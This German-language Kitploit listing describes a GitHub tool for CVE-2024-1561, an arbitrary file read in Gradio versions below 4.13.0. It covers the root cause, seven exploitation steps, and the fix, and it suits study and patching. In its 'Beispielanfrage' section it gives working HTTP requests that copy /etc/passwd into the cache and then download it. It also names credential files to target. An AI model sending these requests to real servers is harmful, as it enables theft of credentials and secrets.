Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-1561 — CVE-2024-1561 – Gradio Beliebiger Dateizugriff | Kitploit
Tools/GitHubGitHub/k3ystr0k3r/cve-2024-1561
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubk3ystr0k3r/cve-2024-1561

CVE-2024-1561

CVE-2024-1561 – Gradio Beliebiger Dateizugriff

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-1561 - Gradio Beliebiger Dateizugriff

CVE-2024-1561 ist eine Schwachstelle für beliebigen Dateizugriff, die Gradio-Versionen vor 4.13.0 betrifft. Gradio ist ein beliebtes Python-Framework, das verwendet wird, um schnell Weboberflächen für Machine-Learning-Modelle und KI-Anwendungen zu erstellen.

Die Schwachstelle existiert, weil der Endpunkt /component_server nicht ordnungsgemäß einschränkt, welche Methoden der internen Component-Klasse aufgerufen werden können. Ein Angreifer kann dieses Verhalten ausnutzen, um Methoden aufzurufen, die nie über HTTP bereitgestellt werden sollten.

Eine dieser Methoden, move_resource_to_block_cache, ermöglicht es, eine Datei vom lokalen Dateisystem in das temporäre Cache-Verzeichnis von Gradio zu kopieren. Sobald die Datei kopiert wurde, wird sie über den Endpunkt /file zugänglich, sodass ein Angreifer ihren Inhalt abrufen kann.

Obwohl die Schwachstelle keine direkte Remote-Code-Ausführung ermöglicht, kann sie sensible Dateien vom Server offenlegen und genutzt werden, um Anmeldeinformationen, Konfigurationsdateien, API-Schlüssel, Token oder andere für weitere Angriffe nützliche Informationen zu sammeln.


Betroffene Versionen

  • Gradio < 4.13.0

Versionen 4.13.0 und höher enthalten die notwendigen Sicherheitsprüfungen, um die willkürliche Methodenaufrufe zu verhindern.

Tool herunterladen

Ursache

Das Problem rührt von unzureichender Validierung innerhalb des /component_server-Endpunkts her.

Anstatt Anfragen auf eine sichere Liste aufrufbarer Funktionen zu beschränken, erlaubte Gradio Angreifern, beliebige Methodennamen anzugeben, die zu einer Komponenteninstanz gehören.

Weil die interne Methode:

root@kitploit:~
move_resource_to_block_cache()

einen Dateisystempfad als Eingabe akzeptiert, kann ein Angreifer die Anwendung anweisen, jede lesbare Datei auf dem Server zwischenzuspeichern.

Sobald die Datei zwischengespeichert ist, wird sie über die normale Dateibereitstellungsfunktion von Gradio offengelegt.


Ausnutzungsprozess

Ein erfolgreicher Angriff folgt in der Regel diesen Schritten:

  1. Den /config-Endpunkt abfragen.
  2. Eine gültige Komponenten-ID erhalten.
  3. Eine Anfrage an /component_server senden.
  4. Die Methode move_resource_to_block_cache aufrufen.
  5. Den Pfad einer Zieldatei angeben (z. B. /etc/passwd).
  6. Den temporären Cache-Pfad in der Serverantwort erhalten.
  7. Die zwischengespeicherte Datei über den /file-Endpunkt herunterladen.

Dieser Prozess ermöglicht es, beliebige Dateien, die vom Gradio-Prozess lesbar sind, remote abzurufen.


Beispielanfrage

root@kitploit:~
POST /component_server HTTP/1.1
Host: target
Content-Type: application/json

{
    "component_id": "3",
    "data": "/etc/passwd",
    "fn_name": "move_resource_to_block_cache",
    "session_hash": "aaaaaaaaaaa"
}

Bei Erfolg gibt Gradio den Speicherort der zwischengespeicherten Datei zurück.

Der Angreifer kann dann anfordern:

root@kitploit:~
GET /file=/tmp/gradio/<cached-file>/passwd HTTP/1.1
Host: target

um den Inhalt abzurufen.


Sicherheitsauswirkungen

Eine erfolgreiche Ausnutzung kann es einem Angreifer ermöglichen, sensible Dateien zu lesen, darunter:

  • /etc/passwd
  • Private SSH-Schlüssel
  • Umgebungsdateien (.env)
  • API-Token
  • Cloud-Anmeldeinformationen
  • Anwendungskonfigurationsdateien
  • Datenbank-Anmeldeinformationen
  • Quellcode
  • Authentifizierungsgeheimnisse

Die Auswirkungen hängen von den Berechtigungen der Gradio-Anwendung ab.


Abhilfemaßnahmen

Um diese Schwachstelle zu beheben:

  • Aktualisieren Sie Gradio auf 4.13.0 oder höher.
  • Vermeiden Sie es, Gradio-Anwendungen direkt dem öffentlichen Internet auszusetzen.
  • Erzwingen Sie nach Möglichkeit eine Authentifizierung.
  • Beschränken Sie den Zugriff mithilfe eines Reverse-Proxys oder einer Firewall.
  • Führen Sie Gradio mit den geringstmöglichen Berechtigungen aus.
  • Vermeiden Sie es, sensible Anmeldeinformationen an Orten zu speichern, die für den Anwendungsprozess zugänglich sind.

Referenzen

  • CVE: https://nvd.nist.gov/vuln/detail/CVE-2024-1561
  • Patch: https://github.com/gradio-app/gradio/pull/6884

Haftungsausschluss

Dieses Repository wird nur für Bildungszwecke, Sicherheitsforschung und autorisierte Penetrationstests bereitgestellt. Holen Sie stets die ausdrückliche Genehmigung ein, bevor Sie Systeme testen, die Sie nicht besitzen oder für die Sie keine Berechtigung zur Überprüfung haben.